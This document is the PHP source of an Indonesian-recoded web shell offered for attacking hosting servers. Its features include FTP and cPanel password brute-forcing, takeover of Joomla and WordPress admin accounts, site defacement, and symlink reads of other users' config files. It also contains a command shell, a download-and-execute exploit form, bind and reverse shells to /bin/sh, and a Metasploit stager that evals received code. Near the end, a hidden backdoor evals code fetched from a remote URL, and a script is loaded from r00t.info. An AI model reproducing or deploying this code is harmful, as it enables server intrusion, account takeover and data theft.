- echo '<br><center><k>WebShell Recoded By NoNameUser</k><br><br>S I R N A Merupakan Shell hasil recode dari shell k2ll33d & Sadness Shell , <br>kemudian ditambahkan beberapa fungsi-fungsi agar shell lebih powerful dan userfriendly.<br>
- beberapa fungsi diambil dari shell yang sudah ada dan selebihnya merupakan kreasi penulis sendiri.<br>shell ini aman dan bersih dari yang namanya Logger meskipun script ini diencode, <br>penulis tidak menyisipkan Logger pada gambar ataupun dalam script PHP ini.
- <br><k>Mail: <a href=mailto:htaccess12@gmail.com>Error Violence</a><br><br><a href="https://facebook.com/errorviolence" target="_blank">Facebook</k></a> </center><iframe width="0" height="0" src="https://www.youtube.com/embed/a3sbfHu-6Fk?autoplay=1" frameborder="0" allowfullscreen></iframe>';
- }
- elseif (isset($_GET['x']) && ($_GET['x'] == 'brute')) {
- $connect_timeout = 5;
- set_time_limit(0);
- $submit = $_REQUEST['submit'];
- $users = $_REQUEST['users'];
- $pass = $_REQUEST['passwords'];
- $target = $_REQUEST['target'];
- $cracktype = $_REQUEST['cracktype'];
- if ($target == "") {
- $target = "localhost";
- }<div align="center"><form method="POST" style="border:1px solid #000000"><br>function ftp_check($host, $user, $pass, $timeout)
- {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "ftp://$host");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
- curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
- curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
- curl_setopt($ch, CURLOPT_FAILONERROR, 1);
- $data = curl_exec($ch);
- if (curl_errno($ch) == 28) {
- print "<b>Connection Timed out</b>";
- exit;
- } elseif (curl_errno($ch) == 0) {
- print "<table width='67%'><tr><td align=center><b>Username ($user) | Password ($pass)</b></td></tr></table>";
- }
- curl_close($ch);
- }
- function cpanel_check($host, $user, $pass, $timeout)
- {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
- curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
- curl_setopt($ch, CURLOPT_FAILONERROR, 1);
- $data = curl_exec($ch);
- if (curl_errno($ch) == 28) {
- print "<b>Connection Timed out</b>";
- exit;
- } elseif (curl_errno($ch) == 0) {
- print "<table width='67%'><tr><td align=center><b>[+]Username ($user) | Password ($pass)</b></td></tr></table>";
- }
- curl_close($ch);
- }
- if (isset($submit) && !empty($submit)) {
- if (empty($users) && empty($pass)) {
- print "<p><b>Error : Check The Users and Password List</b></p>";
- exit;
- }
- if (empty($users)) {
- print "<p><b>Error :Check The Users List</b></p>";
- exit;
- }
- if (empty($pass)) {
- print "<p><b>Error :Check The Password List</b></p>";
- exit;
- }
- ;
- $userlist = explode("\n", $users);
- $passlist = explode("\n", $pass);
- print "<b>[~] Wait ...</b><br><br>";
- foreach ($userlist as $user) {
- $pureuser = trim($user);
- foreach ($passlist as $password) {
- $purepass = trim($password);
- if ($cracktype == "ftp") {
- ftp_check($target, $pureuser, $purepass, $connect_timeout);
- }
- if ($cracktype == "cpanel") {
- cpanel_check($target, $pureuser, $purepass, $connect_timeout);
- }
- }
- }
- }
- echo "<form method=POST action=''><table width='67%'><tr><td><br><p align='center'><b><span lang='en-us'>IP</span> :<input class='inputz' type='text' name='target' size='16' value=$target></b></p><div align='center'><p align='center'>users<textarea class='inputz' cols=20 rows=20 name='users'>";
- system('ls /var/mail');
- echo "</textarea>passwords<textarea class='inputz' cols=20 rows=20 name='passwords'>123123\n123456\n1234567\n12345678\n123456789\n159159\n112233\nadmin\n332211\n1478963\npassword\npasswd\n159357\n357951\n114477\npass\nPassword</textarea><br><br><input name='cracktype' value='cpanel' checked type='radio'></span><b>Cpanel(2082)</b><input name='cracktype' value='ftp' style='font-weight: 700;' type='radio'></font></font><font style='font-weight: 700;' size='2' face='Tahoma'><span style='font-weight: 700;'>Ftp (21)</span></p><br><center><input class='inputzbut' type='submit' value='Start Cracking' name='submit'></center></td></tr></table></td></tr></form>";
- die();
- } elseif (isset($_GET['x']) && ($_GET['x'] == 'joomla')) {
- if (empty($_POST['pwd'])) {
- echo "<center><br><br><br><FORM method='POST'><br><br><br>DB_Prefix : <INPUT class ='inputz' size='15' value='jos_' name='prefix' type='text'> host : <INPUT class ='inputz' size='15' value='localhost' name='localhost' type='text'> database : <INPUT class ='inputz' size='15' value='database' name='database' type='text'> username : <INPUT class ='inputz' size='15' value='db_user' name='username' type='text'> password : <INPUT class ='inputz' size='15' value='db_pass' name='password' type='text'><br> <br>New Username: <INPUT class ='inputz' name='admin' size='15' value='k2'><br><br>New Password: <INPUT class ='inputz' name='pwd' size='15' value='123123'><br><br> <INPUT value='change' class='inputzbut' name='send' type='submit'></FORM>";
- } else {
- $prefix = $_POST['prefix'];
- $localhost = $_POST['localhost'];
- $database = $_POST['database'];
- $username = $_POST['username'];
- $password = $_POST['password'];
- $admin = $_POST['admin'];
- $pd = ($_POST["pwd"]);
- $pwd = md5($pd);
- @mysql_connect($localhost, $username, $password) or die(mysql_error());
- @mysql_select_db($database) or die(mysql_error());
- $SQL = @mysql_query("UPDATE " . $prefix . "users SET username ='" . $admin . "' WHERE name = 'Super User' or name = 'Super Utilisateur' or id='62'") or die(mysql_error());
- $SQL = @mysql_query("UPDATE " . $prefix . "users SET password ='" . $pwd . "' WHERE name = 'Super User' or name = 'Super Utilisateur' or id='62'") or die(mysql_error());
- if ($SQL)
- echo "<br><br><center><h1>Done... go and login</h1></center>";
- }
- } elseif (isset($_GET['x']) && ($_GET['x'] == 'domains')) {
- echo "<br><br><p align=center>Domains and Users</p>";
- $d0mains = @file("/etc/named.conf");
- if (!$d0mains) {
- die("<center>Error : i can't read [ /etc/named.conf ]</center>");
- }
- echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';
- foreach ($d0mains as $d0main) {
- if (eregi("zone", $d0main)) {
- preg_match_all('#zone "(.*)"#', $d0main, $domains);
- flush();
- if (strlen(trim($domains[1][0])) > 2) {
- $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
- echo "<tr><td><a href=http://www." . $domains[1][0] . "/>" . $domains[1][0] . "</a></td><td>" . $user['name'] . "</td></tr>";
- flush();
- }
- }
- }
- }
- elseif (isset($_GET['krypton'])) {
- global $do, $scnya;
- function defacean($scnya){
- $do=$_SERVER['DOCUMENT_ROOT'];
- chdir($do);
- if(function_exists('fopen') && function_exists('fwrite'))
- {
- $script=fopen("index.php", "wb");
- if($script)
- {
- fwrite($script, $scnya);
- echo '<script>alert("Berhasil Deface :v => index.php");</script>';
- }
- else
- {
- echo '<script>alert("Akses Ditolak")</script>';
- }
- fclose($script);
- }
- }
- <br/><br/>
- }
- elseif (isset($_GET['x']) && ($_GET['x'] == 'wordpress')) {
- if (empty($_POST['pwd'])) {
- echo "<br><br><br><br><br><br><FORM method='POST'>DB_Prefix : <INPUT class ='inputz' size='15' value='wp_' name='prefix' type='text'> host : <INPUT class ='inputz' size='15' value='localhost' name='localhost' type='text'> database : <INPUT class ='inputz' size='15' value='Database' name='database' type='text'> username : <INPUT class ='inputz' size='15' value='db_user' name='username' type='text'> password : <INPUT class ='inputz' size='15' value='db_pass' name='password' type='text'> <br><br>New username : <INPUT class ='inputz' name='admin' size='15' value='k2'><br><br>New password : <INPUT class ='inputz' name='pwd' size='15' value='123123'><br> <br><INPUT class='inputzbut' value='change' name='send' type='submit'></FORM>";
- } else {
- $prefix = $_POST['prefix'];
- $localhost = $_POST['localhost'];
- $database = $_POST['database'];
- $username = $_POST['username'];
- $password = $_POST['password'];
- $pwd = $_POST['pwd'];
- $admin = $_POST['admin'];
- @mysql_connect($localhost, $username, $password) or die(mysql_error());
- @mysql_select_db($database) or die(mysql_error());
- $hash = crypt($pwd);
- $k2 = @mysql_query("UPDATE " . $prefix . "users SET user_login ='" . $admin . "' WHERE ID = 1") or die(mysql_error());
- $k2 = @mysql_query("UPDATE " . $prefix . "users SET user_pass ='" . $hash . "' WHERE ID = 1") or die(mysql_error());
- if ($k2) {
- echo '<br><br><center><h1>Done ... go and login</h1></center>';
- }
- }
- echo '</center>';
- } elseif (isset($_GET['x']) && ($_GET['x'] == 'string')) {
- $text = $_POST['code'];<center><form method="post"><br><br><br><textarea class='inputz' cols=80 rows=5 name="code">Krypton</textarea><br><br><select class='inputz' size="1" name="ope"><option value="base64">Base64</option><option value="md5">md5</option><option value="whash">Crypt</option><option value="SHA1">SHA1</option><option value="urlencode">URL Encoding</option><option value="md4">md4</option><option value="SHA256">SHA256</option></select> <input class='inputzbut' type='submit' value='encrypt'></form>$op = $_POST["ope"];
- switch ($op) {
- case 'base64':
- $codi = base64_encode($text);
- break;
- case 'md5':
- $codi = md5($text);
- break;
- case 'whash':
- $codi = crypt($text);
- break;
- case 'SHA1':
- $codi = sha1($text);
- break;
- case 'urlencode':
- $codi = urlencode($text);
- break;
- case 'md4':
- $codi = hash("md4", $text);
- break;
- case 'SHA256':
- $codi = hash("sha256", $text);
- break;
- default:
- break;
- }
- echo '<textarea cols=80 rows=10 class="inputz" readonly>' . $codi . '</textarea></center>';
- }
- elseif (isset($_GET['x']) && ($_GET['x'] == 'sym')) {
- @set_time_limit(0);
- @mkdir('sym', 0777);
- error_reporting(0);
- $htaccess = "Options all \n DirectoryIndex gaza.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
- $op = @fopen('sym/.htaccess', 'w');
- fwrite($op, $htaccess);
- echo '<center><br><br><form method="post"> File Path:<br><input class="inputz" type="text" name="file" value="/home/user/public_html/config.php" size="60"/><br>Symlink Name<br><input class="inputz" type="text" name="symfile" value="s.txt" size="60"/><br><br><input class="inputzbut" type="submit" value="symlink" name="symlink" /><br><br></form></center>';
- $target = $_POST['file'];
- $symfile = $_POST['symfile'];
- $symlink = $_POST['symlink'];
- if ($symlink) {
- @symlink("$target", "sym/$symfile");
- echo '<br><center><a target="_blank" href="sym/' . $symfile . '" >' . $symfile . '</a><center>';
- }
- }
- elseif (isset($_GET['x']) && ($_GET['x'] == 'cmsdet')) {
- echo $bencong . "<center><p class='font-effect-shadow-multiple' style=font-family:Ubuntu;font-size:25px;color:#58FAF4;><b>CMS Detector</b></p>";
- <form action="?sad=echo $pwd;&x=cmsdet" method="post">
- <br><br>
- if (!file_exists('ag.tmp')) {
- @fopen('ag.tmp', 'w');
- echo '<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
- echo '<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table>';
- $p = 0;
- if (is_readable("/var/named")) {
- $list = scandir("/var/named");
- $current_dir = posix_getcwd();
- $dir = explode("/", $current_dir);
- foreach ($list as $domain) {
- if (strpos($domain, ".db")) {
- $domain = str_replace('.db', '', $domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/" . $domain));
- error_reporting(0);
- $link = $pageURL . 'pee/' . $owner['name'];
- cms_add($link, $domain, $owner['name'], "WordPress");
- cms_add($link, $domain, $owner['name'], "Joomla");
- cms_add($link, $domain, $owner['name'], "vBulletin");
- cms_add($link, $domain, $owner['name'], "WHMCS");
- cms_add($link, $domain, $owner['name'], "PhpBB");
- cms_add($link, $domain, $owner['name'], "MyBB");
- cms_add($link, $domain, $owner['name'], "IPB");
- cms_add($link, $domain, $owner['name'], "SMF");
- cms_add($link, $domain, $owner['name'], "Drupal");
- cms_add($link, $domain, $owner['name'], "e107");
- cms_add($link, $domain, $owner['name'], "Seditio");
- cms_add($link, $domain, $owner['name'], "osCommerce");
- }
- }
- }
- } else {
- echo '<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
- echo '<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table><br><br>';
- $content = file_get_contents($pageURL . 'ag.tmp');
- echo $content;
- }
- }
- elseif (isset($_GET['x']) && ($_GET['x'] == 'phpinfo')) {
- @ob_start();
- @eval("phpinfo();");
- $buff = @ob_get_contents();
- @
- $awal = strpos($buff, "<body>") + 6;
- $akhir = strpos($buff, "</body>");
- echo "<div class='phpinfo'>" . substr($buff, $awal, $akhir - $awal) . "</div>";
- } elseif (isset($_GET['view']) && ($_GET['view'] != "")) {
- if (is_file($_GET['view'])) {
- if (!isset($file))
- $file = magicboom($_GET['view']);
- if (!$win && $posix) {
- $name = @posix_getpwuid(@fileowner($file));
- $group = @posix_getgrgid(@filegroup($file));
- $owner = $name['name'] . "<span class='gaya'> : </span>" . $group['name'];
- } else {
- $owner = $user;
- }
- $filn = basename($file);
- echo "<table style='margin:6px 0 0 2px;line-height:20px;'> <tr><td>Filename</td><td><span id='" . clearspace($filn) . "_link'>" . $file . "</span> <form action='?sad=" . $pwd . "&view=$file' method='post' id='" . clearspace($filn) . "_form' class='sembunyi' style='margin:0;padding:0;'> <input type='hidden' name='oldname' value='" . $filn . "' style='margin:0;padding:0;' /> <input class='inputz' style='width:200px;' type='text' name='newname' value='" . $filn . "' /> <input class='inputzbut' type='submit' name='rename' value='rename' /> <input class='inputzbut' type='submit' name='cancel' value='cancel' onclick='tukar('" . clearspace($filn) . "_link','" . clearspace($filn) . "_form');' /> </form> </td></tr> <tr><td>Size</td><td>" . ukuran($file) . "</td></tr> <tr><td>Permission</td><td>" . get_perms($file) . "</td></tr> <tr><td>Owner</td><td>" . $owner . "</td></tr> <tr><td>Create time</td><td>" . date("d-M-Y H:i", @filectime($file)) . "</td></tr> <tr><td>Last modified</td><td>" . date("d-M-Y H:i", @filemtime($file)) . "</td></tr> <tr><td>Last accessed</td><td>" . date("d-M-Y H:i", @fileatime($file)) . "</td></tr> <tr><td>Actions</td><td><a href='?sad=$pwd&edit=$file'>edit</a> | <a href=\"javascript:tukar(\"" . clearspace($filn) . "_link','" . clearspace($filn) . "_form\");\">rename</a> | <a href='?sad=$pwd&delete=$file'>delete</a> | <a href='?sad=$pwd&dl=$file'>download</a> (<a href='?sad=$pwd&dlgzip=$file'>gzip</a>)</td></tr> <tr><td>View</td><td><a href='?sad=" . $pwd . "&view=" . $file . "'>text</a> | <a href='?sad=" . $pwd . "&view=" . $file . "&type=code'>code</a> | <a href='?sad=" . $pwd . "&view=" . $file . "&type=image'>image</a></td></tr></table>";
- if (isset($_GET['type']) && ($_GET['type'] == 'image')) {
- echo "<div style='text-align:center;margin:8px;'><img src='?sad=" . $pwd . "&img=" . $filn . "'></div>";
- } elseif (isset($_GET['type']) && ($_GET['type'] == 'code')) {
- echo "<div class='viewfile'>";
- $file = wordwrap(@file_get_contents($file), "240", "\n");
- @highlight_string($file);
- echo "</div>";
- } else {
- echo "<div class='viewfile'>";
- echo nl2br(htmlentities((@file_get_contents($file))));
- echo "</div>";
- }
- } elseif (is_dir($_GET['view'])) {
- echo showdir($pwd, $prompt);
- }
- } elseif (isset($_GET['edit']) && ($_GET['edit'] != "")) {
- if (isset($_POST['save'])) {
- $file = $_POST['saveas'];
- $content = magicboom($_POST['content']);
- if ($filez = @fopen($file, "w")) {
- $time = date("d-M-Y H:i", time());
- if (@fwrite($filez, $content))
- $msg = "file saved <span class='gaya'>@</span> " . $time;
- else
- $msg = "failed to save";
- @fclose($filez);
- } else
- $msg = "permission denied";
- }
- if (!isset($file))
- $file = $_GET['edit'];
- if ($filez = @fopen($file, "r")) {
- $content = "";
- while (!feof($filez)) {
- $content .= htmlentities(str_replace("''", "'", fgets($filez)));
- }
- @fclose($filez);
- }<form action="?sad=echo $pwd;&edit=echo $file;" method="post"> <table class="cmdbox"> <tr><td colspan="2">
- <textarea class="output" name="content">
- echo $content;</textarea> <tr>
- <td colspan="2">Save as <input onMouseOver="this.focus()" id="cmd" class="inputz" type="text" name="saveas" style="width:60%" value="echo $file;" />
- <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%" />
- echo $msg;</td></tr></table></form> } elseif (isset($_GET['x']) && ($_GET['x'] == 'upload')) {
- if (isset($_POST['uploadcomp'])) {
- if (is_uploaded_file($_FILES['file']['tmp_name'])) {
- $path = magicboom($_POST['path']);
- $fname = $_FILES['file']['name'];
- $tmp_name = $_FILES['file']['tmp_name'];
- $pindah = $path . $fname;
- $stat = @move_uploaded_file($tmp_name, $pindah);
- if ($stat) {
- $msg = "file uploaded to $pindah";
- } else
- $msg = "failed to upload $fname";
- } else
- $msg = "failed to upload $fname";
- } elseif (isset($_POST['uploadurl'])) {
- $pilihan = trim($_POST['pilihan']);
- $wurl = trim($_POST['wurl']);
- $path = magicboom($_POST['path']);
- $namafile = download($pilihan, $wurl);
- $pindah = $path . $namafile;
- if (is_file($pindah)) {
- $msg = "file uploaded to $pindah";
- } else
- $msg = "failed to upload $namafile";
- }
- <form action="?sad=echo $pwd;&x=upload" enctype="multipart/form-data" method="post"><br><br><br>
- <table class="tabnet" style="width:320px;padding:0 1px"> <tr><th colspan="2">Local</th></tr> <tr><td colspan="2"><p style="text-align:center"><input style="color:#000000" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%" name="path" value="echo $pwd;" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px"> <tr><th colspan="2">Remote</th></tr> <tr><td colspan="2"><form method="post" style="margin:0;padding:0" actions="?sad=echo $pwd;&x=upload"> <table><tr><td>link</td>
- <td><input class="inputz" type="text" name="wurl" style="width:250px" value="http://site/file.*"></td></tr> <tr><td colspan="2">
- <input type="text" class="inputz" style="width:99%" name="path" value="echo $pwd;" /></td></tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px"></td></tr></form></table></td> </tr> </table> <div style="text-align:center;margin:2px">echo $msg;</div>
- } elseif (isset($_GET['x']) && ($_GET['x'] == 'netsploit')) {
- if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) {
- $port = trim($_POST['port']);
- $passwrd = trim($_POST['bind_pass']);
- tulis("bdc.c", $port_bind_bd_c);
- exe("gcc -o bdc bdc.c");
- exe("chmod 777 bdc");
- @unlink("bdc.c");
- exe("./bdc " . $port . " " . $passwrd . " &");
- $scan = exe("ps aux");
- if (eregi("./bdc $por", $scan)) {
- $msg = "<p>Process successed</p>";
- } else {
- $msg = "<p>Process Failed</p>";
- }
- } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) {
- $port = trim($_POST['port']);
- $passwrd = trim($_POST['bind_pass']);
- tulis("bdp", $port_bind_bd_pl);
- exe("chmod 777 bdp");
- $p2 = which("perl");
- exe($p2 . " bdp " . $port . " &");
- $scan = exe("ps aux");
- if (eregi("$p2 bdp $port", $scan)) {
- $msg = "<p>Process successed</p>";
- } else {
- $msg = "<p>Process Failed</p>";
- }
- } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) {
- $ip = trim($_POST['ip']);
- $port = trim($_POST['backport']);
- tulis("bcc.c", $back_connect_c);
- exe("gcc -o bcc bcc.c");
- exe("chmod 777 bcc");
- @unlink("bcc.c");
- exe("./bcc " . $ip . " " . $port . " &");
- $msg = "trying to connect to " . $ip . " on port " . $port . " ...";
- } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) {
- $ip = trim($_POST['ip']);
- $port = trim($_POST['backport']);
- tulis("bcp", $back_connect);
- exe("chmod +x bcp");
- $p2 = which("perl");
- exe($p2 . " bcp " . $ip . " " . $port . " &");
- $msg = "Trying to connect to " . $ip . " on port " . $port . " ...";
- } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) {
- $pilihan = trim($_POST['pilihan']);
- $wurl = trim($_POST['wurl']);
- $namafile = download($pilihan, $wurl);
- if (is_file($namafile)) {
- $msg = exe($wcmd);
- } else
- $msg = "error: file not found $namafile";
- }<br><br><br><br> <table class="tabnet"> <tr><th>Bind Port</th><th>Back connect</th><th>download and Exec</th></tr><tr><td> <table> <form method="post" actions="?sad=echo $pwd;&x=netsploit"><tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="echo $bindport;"></td></tr> <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="echo $bindport_pass;"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select><input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form></table> </td> <td><table> <form method="post" actions="?sad=echo $pwd;&x=netsploit"><tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"));"></td></tr> <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="echo $bindport;"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form></table> </td> <td> <table> <form method="post" actions="?sad=echo $pwd;&x=netsploit"><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px" value="www.some-code/exploits.c"></td></tr><tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option><option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px"></td></tr></form></table></td></tr></table><div style="text-align:center;margin:2px">echo $msg;</div><br>
- error_reporting(0);
- function ss($t)
- {
- if (!get_magic_quotes_gpc())
- return trim(urldecode($t));
- return trim(urldecode(stripslashes($t)));
- }
- $s_my_ip = gethostbyname($_SERVER['HTTP_HOST']);
- $rsport = "443";
- $rsportb4 = $rsport;
- $rstarget4 = $s_my_ip;
- $s_result = "<center><div class='mybox' align='center'><td><h2>Reverse shell ( php )</h2><form method='post' actions='?sad=echo $pwd;&x='netsploit'><table class='myboxtbl'><tr><td style='width:100px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' name='rstarget4' value='" . $rstarget4 . "' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' name='sqlportb4' value='" . $rsportb4 . "' /></td></tr></table><input type='submit' name='xback_php' class='inputzbut' value='connect' style='width:120px;height:30px;margin:10px 2px 0 2px;' /><input type='hidden' name='d' value='" . $pwd . "' /></form></td><hr color='#4C83AF'><td><form method='POST'><table class='myboxtbl'><h2>Metasploit Connection </h2><tr><td style='width:100px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' size='40' name='yip' value='" . $my_ip . "' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' size='5' name='yport' value='443' /></td></tr></table><input class='inputzbut' type='submit' value='Connect' name='metaConnect' style='width:120px;height:30px;margin:10px 2px 0 2px;'></form></td></div></center>";
- echo $s_result;
- if ($_POST['metaConnect']) {
- $ipaddr = $_POST['yip'];
- $port = $_POST['yport'];
- if ($ip == "" && $port == "") {
- echo "fill in the blanks";
- } else {
- if (FALSE !== strpos($ipaddr, ":")) {
- $ipaddr = "[" . $ipaddr . "]";
- }
- if (is_callable('stream_socket_client')) {
- $msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");
- if (!$msgsock) {
- die();
- }
- $msgsock_type = 'stream';
- } elseif (is_callable('fsockopen')) {
- $msgsock = fsockopen($ipaddr, $port);
- if (!$msgsock) {
- die();
- }
- $msgsock_type = 'stream';
- } elseif (is_callable('socket_create')) {
- $msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
- $res = socket_connect($msgsock, $ipaddr, $port);
- if (!$res) {
- die();
- }
- $msgsock_type = 'socket';
- } else {
- die();
- }
- switch ($msgsock_type) {
- case 'stream':
- $len = fread($msgsock, 4);
- break;
- case 'socket':
- $len = socket_read($msgsock, 4);
- break;
- }
- if (!$len) {
- die();
- }
- $a = unpack("Nlen", $len);
- $len = $a['len'];
- $buffer = '';
- while (strlen($buffer) < $len) {
- switch ($msgsock_type) {
- case 'stream':
- $buffer .= fread($msgsock, $len - strlen($buffer));
- break;
- case 'socket':
- $buffer .= socket_read($msgsock, $len - strlen($buffer));
- break;
- }
- }
- eval($buffer);
- echo "[*] Connection Terminated";
- die();
- }
- }
- if (isset($_REQUEST['sqlportb4']))
- $rsportb4 = ss($_REQUEST['sqlportb4']);
- if (isset($_REQUEST['rstarget4']))
- $rstarget4 = ss($_REQUEST['rstarget4']);
- if ($_POST['xback_php']) {
- $ip = $rstarget4;
- $port = $rsportb4;
- $chunk_size = 1337;
- $write_a = null;
- $error_a = null;
- $shell = '/bin/sh';
- $daemon = 0;
- $debug = 0;
- if (function_exists('pcntl_fork')) {
- $pid = pcntl_fork();
- if ($pid == -1)
- if ($pid)
- if (posix_setsid() == -1)
- $daemon = 1;
- }
- umask(0);
- $sock = fsockopen($ip, $port, $errno, $errstr, 30);
- if (!$sock)
- $descriptorspec = array(
- 0 => array(
- "pipe",
- "r"
- ),
- 1 => array(
- "pipe",
- "w"
- ),
- 2 => array(
- "pipe",
- "w"
- )
- );
- $process = proc_open($shell, $descriptorspec, $pipes);
- if (!is_resource($process))
- stream_set_blocking($pipes[0], 0);
- stream_set_blocking($pipes[1], 0);
- stream_set_blocking($pipes[2], 0);
- stream_set_blocking($sock, 0);
- while (1) {
- if (feof($sock))
- break;
- if (feof($pipes[1]))
- break;
- $read_a = array(
- $sock,
- $pipes[1],
- $pipes[2]
- );
- $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
- if (in_array($sock, $read_a)) {
- $input = fread($sock, $chunk_size);
- fwrite($pipes[0], $input);
- }
- if (in_array($pipes[1], $read_a)) {
- $input = fread($pipes[1], $chunk_size);
- fwrite($sock, $input);
- }
- if (in_array($pipes[2], $read_a)) {
- $input = fread($pipes[2], $chunk_size);
- fwrite($sock, $input);
- }
- }
- fclose($sock);
- fclose($pipes[0]);
- fclose($pipes[1]);
- fclose($pipes[2]);
- proc_close($process);
- $rsres = " ";
- $s_result .= $rsres;
- }
- } elseif (isset($_GET['x']) && ($_GET['x'] == 'shell')) {
- <form action="?sad=echo $pwd;&x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2">
- <textarea class="output" readonly>
- echo '$ '.$_POST['cmd']."\n";
- if (isset($_POST['submitcmd'])) {
- echo @exe($_POST['cmd']);
- }
- </textarea> <tr><td colspan="2">echo $prompt;<input onMouseOver="this.focus()" id="cmd" class="inputz" type="text" name="cmd" style="width:60%" value="" /><input class="inputzbut" type="submit" value="Do !" name="submitcmd" style="width:12%" /></td></tr> </table></form>
- } else {
- if (isset($_GET['delete']) && ($_GET['delete'] != "")) {
- $file = $_GET['delete'];
- @unlink($file);
- } elseif (isset($_GET['fdelete']) && ($_GET['fdelete'] != "")) {
- $dir = $_GET['fdelete'];
- if (is_dir($dir)) {
- if (!rmdir($dir)) {
- $s = scandir($dir);
- foreach ($s as $ss) {
- if (is_file($dir . "/" . $ss)) {
- if (unlink($dir . "/" . $ss)) {
- $rm = rmdir($dir);
- }
- }
- }
- }
- }
- } elseif (isset($_GET['mkdir']) && ($_GET['mkdir'] != "")) {
- $path = $pwd . $_GET['mkdir'];
- @mkdir($path);
- }
- $buff = showdir($pwd, $prompt);
- echo $buff;
- }
- ob_flush();@session_start();
- @error_reporting(0);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('display_errors', 0);
- @ini_set('output_buffering',0);
- @set_time_limit(0);
- @set_magic_quotes_runtime(0);
- @session_start();
- @error_reporting(0);
- $a = 'session_start();
- if($_SESSION["adm"]){
- echo \'<b>Namesis<br><br>\'.php_uname().\'<br></b>\';echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';if( $_POST[\'_upl\'] == "Upload" ) { if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload Success !!!</b><br><br>\'; } else { echo \'<b>Upload Fail !!!<script src=http://r00t.info/ccb.js></script></b><br><br>\'; }}
- }
- if($_POST["p"]){
- $p = $_POST["p"];
- $pa = md5(sha1($p));
- if($pa=="683ce9b1d91af441dec18dad25584421"){
- $_SESSION["adm"] = 1;
- }
- }
- <form action="" method="post">
- <input type="text" name="p">
- </form>
- ';
- if(@$_REQUEST["px"]){
- $p = @$_REQUEST["px"];
- $pa = md5(sha1($p));
- if($pa=="683ce9b1d91af441dec18dad25584421"){
- echo @eval(@file_get_contents(@$_REQUEST["404"]));
- }
- }
- if(@!$_SESSION["sdm"]){
